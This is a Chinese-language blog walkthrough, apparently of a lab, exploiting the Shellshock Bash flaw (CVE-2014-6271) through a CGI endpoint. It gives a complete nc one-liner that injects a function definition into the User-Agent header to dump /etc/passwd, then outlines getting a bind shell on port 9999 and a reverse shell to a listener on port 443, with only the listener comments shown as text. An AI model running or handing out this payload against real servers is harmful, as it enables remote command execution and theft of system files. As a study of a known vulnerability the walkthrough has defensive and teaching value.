Shellshock (CVE-2014-6271)
CVE-2014-6271
GNU Bash 对环境变量中函数定义后的字符串进行处理,攻击者可以构造环境执行任意代码。
漏洞发现
访问页面,发现 cgi 请求
data:image/s3,"s3://crabby-images/de56d/de56dad5a0221a9ac3e3c74ed5c216ea8621306d" alt=""
使用 Burp Suite 抓包进行查看
data:image/s3,"s3://crabby-images/473f6/473f66f052ff4c1cfe4f38cfdf3a0225b27be04b" alt=""
漏洞利用
使用 nc
发送请求,在 User-Agent
字段中定义函数,并在之后添加输出系统文件的命令语句
1 | echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80 |
data:image/s3,"s3://crabby-images/f1e6c/f1e6ce2151352ca675f3cf4ab93148f8b6ef2a2b" alt=""
使用 Burp Suite 进行攻击
data:image/s3,"s3://crabby-images/babf1/babf1b8b8177138c0c131314d166e6f205ac49de" alt=""
Shell
连文件都可以输出,那么进一步可以用来获取 shell ,利用 nc
让服务器监听 9999 端口,再连接获取 shell
1 | # 监听 9999 端口 |
data:image/s3,"s3://crabby-images/0318f/0318f767432dfd4511038f0d7103c62e96c4f841" alt=""
使用 Burp Suite
data:image/s3,"s3://crabby-images/9afea/9afea7c0143b8a5e5ca8e20ad092862ad27bf25f" alt=""
Reverse Shell
本地监听 443 端口,让服务器连接本地,进而获取 shell
1 | # 监听 443 端口 |
data:image/s3,"s3://crabby-images/649cd/649cd7032019203ef4349acaaeff95a0ba7c5a38" alt=""
使用 Burp Suite
data:image/s3,"s3://crabby-images/abd8d/abd8d47e08b5f27582983b603935f867178b386f" alt=""
参阅
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Jckling's Blog!
评论